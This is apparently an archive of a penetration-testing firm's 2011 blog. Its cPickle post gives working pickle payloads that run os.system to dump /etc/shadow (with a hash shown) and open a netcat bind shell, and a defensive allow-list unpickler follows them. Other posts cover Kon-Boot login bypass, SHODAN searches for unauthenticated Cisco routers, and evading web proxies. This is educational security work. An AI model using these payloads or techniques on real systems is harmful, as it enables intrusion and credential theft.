March 17, 2011

Python cPickle: Allows For Arbitrary Code Execution

Hello All,

I was passing some time playing one of our new wargames at Smash The Stack called Amateria and came across something I've not really looked at before: Python's cPickle library. It allows for some interesting fun when unpickling untrusted data received over a socket or any other network communication.

Basically cPickle is a library that enables Python to perform object serialization. Pickling and unpickling are the terms used in the Python community to describe serialization and deserialization respectively. If you are unfamiliar with these terms then I suggest taking a look over the following documentation:

PyMOTW: pickle and cPickle
Pickle — Python Object Serialization

Onto the fun stuff… and what better way to start than with a nice little example:

root@bt:~# python
Python 2.5.2 (r252:60911, Oct 5 2008, 19:24:49)
[GCC 4.3.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import cPickle
>>> exploit = "cos\nsystem\n(S'cat /etc/shadow | head -n 5'\ntR.'\ntR."
>>> cPickle.loads(exploit)
root:$6$m7ndoM3p$JRVXomVQFn/KlkVbjFqCcjlMAD31QlCtoHnoWiE95Fx8Vvwkc8KH81DEePpjycglYiX98usSoESUnml3e6Nlf.:14951:0:99999:7:::
daemon:x:14592:0:99999:7:::
bin:x:14592:0:99999:7:::
sys:x:14592:0:99999:7:::
sync:x:14592:0:99999:7:::
0
>>>

OK, so what happened here? Before I explain, let’s have a look at another example that might help clarify what is going on here:

>>> import pickletools
>>> print pickletools.dis(exploit)
0: c GLOBAL 'os system'
11: ( MARK
12: S STRING 'cat /etc/shadow | head -n 5'
43: t TUPLE (MARK at 11)
44: R REDUCE
45: . STOP
highest protocol among opcodes = 0
None
>>>

As you can see, it loads the module os and calls the system function with the command "cat /etc/shadow | head -n 5", and that is why the first 5 lines of the shadow file were echoed back to our prompt. So we can construct pickled data, pass it to cPickle.loads, and it executes our commands in the context of the user that Python runs as. This is interesting. I won't delve too much into this as I don't want to spoil the wargame level, but I just thought it was a handy little trick to have in your arsenal :-)

Let's take a look at another little example to see the power of this:

root@bt:~# python
Python 2.5.2 (r252:60911, Oct 5 2008, 19:24:49)
[GCC 4.3.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import cPickle
>>> import pickletools
>>> exploit = "cos\nsystem\n(S'/bin/nc -l -p 56758 -c /bin/sh'\ntR.'\ntR."
>>> pickletools.dis(exploit)
0: c GLOBAL 'os system'
11: ( MARK
12: S STRING '/bin/nc -l -p 56758 -c /bin/sh'
46: t TUPLE (MARK at 11)
47: R REDUCE
48: . STOP
highest protocol among opcodes = 0
>>> cPickle.loads(exploit)

Now if we turn to another terminal and type 'echo -e "cat /etc/passwd" | nc 0 56758' we should see something like this:

root@bt:~# echo -e "cat /etc/passwd" | nc 0 56758

We have a remote shell now on the box :-)

If you use cPickle on sockets or in any kind of network communication, you're pretty much owned :-) For some further reading on the subject check out the following link:

Why Python Pickle Is Insecure
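The GLOBAL/REDUCE sequence that pickletools.dis showed above is the whole mechanism: the unpickler resolves a module attribute and then calls it. The following is an added example (not part of the original post) in Python 3's pickle, which is the same format cPickle parses. It constructs a payload with the same opcode shape as the post's, but pointing at os.getcwd so it is harmless to run, then shows a static opcode scan and a find_class allow-list, which is the defence a service that must accept pickles should use.

```python
import io
import os
import pickle
import pickletools

# Constructed protocol-0 pickle: GLOBAL os.getcwd, MARK, TUPLE, REDUCE, STOP.
# Same opcode sequence as the post's os.system payload, but the callable it
# resolves is harmless, so the example can be executed safely.
CRAFTED = b"cos\ngetcwd\n(tR."
# A benign pickle of ordinary data, for comparison.
BENIGN = pickle.dumps({"user": "alice", "ids": [1, 2, 3]})

# Opcodes that make the unpickler import, instantiate or call a Python object.
RISKY_OPS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
             "NEWOBJ", "NEWOBJ_EX", "BUILD"}

def risky_opcodes(data):
    """Static scan: list the opcodes that import or call objects, in order."""
    return [op.name for op, _arg, _pos in pickletools.genops(data)
            if op.name in RISKY_OPS]

class RestrictedUnpickler(pickle.Unpickler):
    """Refuse every global lookup except an explicit allow list (assumed here)."""
    ALLOWED = {("builtins", "set"), ("builtins", "frozenset"),
               ("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")

def safe_loads(data):
    """Drop-in replacement for pickle.loads that cannot resolve os.system."""
    return RestrictedUnpickler(io.BytesIO(data)).load()

def demo():
    """(stock loads called os.getcwd()?, restricted loads refused the pickle?)"""
    unrestricted = pickle.loads(CRAFTED)  # REDUCE calls os.getcwd() during load
    try:
        safe_loads(CRAFTED)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    return unrestricted == os.getcwd(), blocked

if __name__ == "__main__":
    print("crafted:", risky_opcodes(CRAFTED), "benign:", risky_opcodes(BENIGN))
    print("stock loads ran the callable, restricted loads blocked it:", demo())
```

The opcode scan is useful for alerting on pickles seen on the wire, but only the find_class restriction actually stops the call, since a pickle can also reach callables through opcodes the scan does not list.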

Now take your new-found knowledge and apply it to the Amateria wargame. If you get stuck or need to discuss any of the levels, look at the main website for IRC connection details; the wargame channels are named after the wargames.

Enjoy! :-)

March 14, 2011

Firefox 4 Web Console

The final version of Firefox 4 is almost here and, since it's my main tool during pentesting, I have been checking frequently to be sure I'm not going to miss anything when the change comes.

As the change is big, some of the extensions are slowly updating their versions to ensure compatibility with the new release (I did a quick update of the Hackbar extension today to ensure compatibility with FF4), so I'm still stuck on Firefox 3 to use all the plugins I usually install.

One of these plugins is Live HTTP Headers, a simple plugin that lets me check what is going on under the hood in the browser: inspect requests and parameters, then modify them to test the website's functionality. Well, this extension looks like it is not getting a FF4 update (yet) :(

But today I discovered a new feature in FF4: the Web Console. With a handy shortcut, Ctrl+Shift+K, it reveals a debug console with information about HTML/CSS errors, JavaScript debugging information and a Net tab that does exactly what Live HTTP Headers does: display the browser's requests and their related headers.

OK, maybe it's not quite the same (you can't filter out extensions like gif or jpg images), but it also comes with other great stuff, like saving the HTML code generated by the page, allowing a quick review of the result of the request.

There are still many things to sort out before switching from FF3 to FF4 for pentesting, but the future looks promising :)

February 22, 2011

Using Google to bypass web proxies

Maybe this is something you already know, or something someone posted a long time ago, but today I want to share a quick trick we use when we are on a customer site doing a test.

Sometimes, during testing, you need to search for an exploit, a blog post or some resource to help you successfully exploit the vulnerability you just found (or think may be a vulnerability), but internet access is limited by the company's network policy. Yes, we can boot our own machines, use tethering with the mobile, download the code to our machine, copy it onto a USB stick, copy it onto the testing machine and then execute it. But I'm a bit lazy… (that's the reason I work with computers: let the machines do the hard work ;) )

Recently, while playing with User-Agent strings, I discovered a Google service that renders websites for mobiles. It's like the Google Cache service, but with the advantage that you can actually browse the website and, for example, perform searches. Maybe this doesn't work all the time, but it worked for me last week, so it deserves a try!

Ta!

November 25, 2010

Ophcrack and Konboot

Floppies, CD-ROM’s and USB Drives Oh my!

I'm going to be giving a bit of an insight into physical password attacks, as in sitting in front of the computer.

I'm going to show you two tools: Ophcrack and Kon-Boot.

The reason I have chosen these two is firstly that they are incredibly easy to use, and secondly that they take different approaches to the common goal (compromising the machine/account).

So what's the difference?

Ophcrack will try to crack your password so that you know it. This could be handy for trying that username and password on other machines/accounts. It uses rainbow tables, something I won't be discussing today, but I will include links for those who want to understand what is actually happening.

Konboot is even more impressive …

From their website…

"Kon-Boot is a prototype piece of software which allows changing the contents of a Linux kernel (and now the Windows kernel also!) on the fly (while booting). In the current compilation state it allows logging into a Linux system as 'root' user without typing the correct password, or elevating privileges from the current user to root. For Windows systems it allows entering any password protected profile without any knowledge of the password. It was actually started as a silly project of mine, which was born from my never-ending memory problems :) Secondly, it was mainly created for Ubuntu; later I made a few add-ons to cover some other Linux distributions. Finally, please consider this is my first Linux project so far :) The entire Kon-Boot was written in pure x86 assembly, using old grandpa-geezer TASM 4.0"

So if you missed any of that, the skinny is that Kon-Boot will pretty much ignore the authentication part for you on a Windows (and some Linux) operating system. Sick.

Let's look at Ophcrack first.

Before we start: I'm using VMware so I can screencast this, but what you see here can be applied to an actual machine. You will need some CD burning software to put the Ophcrack (and Kon-Boot) image onto a CD; I'll provide links. Although it's virtualized, there is no difference from a physical machine.

Probably best to watch the video full screen.

I hope the screencast wasn't too much of a roller-coaster for you.

Questions?

LINKS:

Ophcrack – http://ophcrack.sourceforge.net/

Kon-Boot – http://www.piotrbania.com/all/kon-boot/

ISO burner for windows – http://isorecorder.alexfeinman.com/isorecorder.htm

Full Disk encryption – speak to our guys at pentura.

November 19, 2010

SHODAN Power…..

In this post I'll demonstrate how the search engine SHODAN can be used to identify and access unprotected network devices, and there are many such devices on the Internet.

Since SHODAN appeared on the Internet scene, I've used it a fair bit for enumerating information from target address ranges. I've also just finished watching a great DEFCON 18 presentation titled SHODAN For Penetration Testing by Michael Schearer.

For those unaware, SHODAN is a computer search engine that crawls the Internet, collecting banner and version information for IP addresses offering FTP, HTTP, TELNET and (if you pay SHODAN for 'credits') HTTPS/SSL services. SHODAN then indexes this gathered data, ready for anyone to search. Why is this useful? For ethical and not-so-ethical reasons, it offers a way of gathering technical information about a target IP, IP network/range, domains etc., which could include server version information, HTTP header results and FTP login banners for IPs that SHODAN has crawled.

It's a very useful tool and, as I am about to explain, can be used in the same way that Google is used to make clever search queries that, for example, would return all URLs that have "passwords.xls" in them.

Here is the SHODAN homepage (www.shodanhq.com). At the top is the search box. I've logged into SHODAN using a GMail account, which gives access to additional search 'operators'.

In my last post, I used Cisco IOS devices as my target and I'm going to do the same here.

As you may already be aware, Cisco IOS devices typically support Telnet, Web and SSH for remote device management. I already know that the web service in Cisco IOS sets the "server" HTTP header to "cisco-ios". I want to create a query that will give me all the Cisco IOS devices running the IOS web service on TCP port 80 (HTTP).

Shodan Search Query = cisco-ios port:80

This query searches for hosts that have port 80 open, and contain “cisco-ios” in the “server” HTTP header results:

Quite a number of results have been returned. The IP address (and DNS name) of the host appears on the left (I've blacked out this information). The banner data, grabbed by Shodan when crawling, is on the right next to each host. I'm going to narrow my search a bit and modify my query to only include IP addresses registered in the UK (country code "GB").

Shodan Search Query = cisco-ios port:80 country:GB

This query searches for hosts that have port 80 open and contain "cisco-ios" in the "server" HTTP header, and limits the results to UK registered IP addresses.

These results are only for UK registered addresses; the little flag icon below the IP address indicates this. You will notice the HTTP banner information returned for each host indicates the host responded with "HTTP 401 Unauthorized", since Shodan stores and indexes these banner/HTTP responses for each host. I want to identify hosts that do NOT return an HTTP 401 error, so I'm going to modify my search query a bit more to include only results where an "HTTP 200 OK" response was received.

Shodan Search Query = cisco-ios 200 port:80 country:GB

This query searches for hosts that have port 80 open and contain "cisco-ios" in the "server" HTTP header, limits the results to UK registered IP addresses, and returns only those hosts with an HTTP 200 OK response.

Now I have a list of IP addresses that returned an HTTP "200 OK" when SHODAN crawled them. With this information provided by SHODAN, I've now identified many Cisco IOS devices on the Internet running a web server that requires no authentication.

SHODAN provides a link to the IP address on the left. Click that and your browser will connect to that IP over HTTP.

Oh dear… this router is accessible. I could modify the URL and list the IOS configuration if I wished…

Or I can execute commands using the "configure" link.

Summary

SHODAN can be used for many different search queries. If you have an idea of what you're looking for (banners, headers etc.) you can ask SHODAN and see what you get in return. SHODAN can be used to identify hosts that are running vulnerable HTTP/FTP/Telnet services; if you know the tell-tale banners, then ask SHODAN!

Using the example above, many Cisco IOS devices provide unauthenticated access. Perhaps the administrators aren't even aware?

November 18, 2010

Virus at train station ticket machine

Every morning I walk to Reading train station and get a return ticket to Mortimer station. As I don't like carrying cash everywhere, I usually pay with a credit card. But this is going to change… Today I went to one of the machines to get my ticket and discovered that something was going wrong:

I looked closer, and what I saw scared me: an antivirus (I think it's Norton) message displaying that something had happened on the machine:

Scan type: Auto-Protect Scan

Event: Security Risk Found!

Threat: W32.Dowadup.B

File: C:\WINDOWS\System32\kwtjuj.tg

Location: Unknown Storage

Computer: RDG81

User: SHERE-GW\RDGRSU-SUP

Action take: Clean failed : Quarantine failed : Delete succeeded : Acce (incomplete, probably Access denied)

Date found: 17 November 2010 17:21:28

But the scariest part of the window is the fact that the number of notifications is 10! This machine has had at least ten attacks/infection attempts (maybe the antivirus didn't catch all the threats…)! I don't know how they configure their network, but I hope First Great Western doesn't have the ticket machines on the same network as the rest of their machines. Also, from this screen we can guess it's running Windows XP and probably using Internet Explorer 6…

Tomorrow I’ll carry some cash for my ticket, and you?

P.S. Yes, people looked at me weird when I was doing the pics :P

November 12, 2010

Vulnerability Development: Buffer Overflows: RET Overwrite…

Hello all, my name is Mike Evans and I'm a security consultant here at Pentura. The other day I was asked by a certain Spanish someone if I could contribute to the blog ;-) At first I wasn't too sure what to write about, but after a while I decided to write about vulnerability development, as this is an area of research I am very passionate about. Now, this is a very broad topic and I am still learning all about it. What I plan to do is start at the very beginning and take you through it a post at a time, building on each post as we go. First of all I want to talk about the various types of vulnerabilities: what they are, how to control them and how to exploit them. Then I want to go over the various protections that have been implemented to try and mitigate these vulnerabilities, and how to bypass those mitigations. This is the part I love about vulnerability development: the way hackers find ways around the protections implemented by software and hardware vendors. This is definitely the thrill for me.

To start with, in this post I am going to talk about buffer overflows: what they are, how to control them and how to exploit them. Before we dive into the fun stuff, if you don't know anything about memory management, the stack data structure and the basics of assembly language, then I suggest you take a moment to read over the following links:
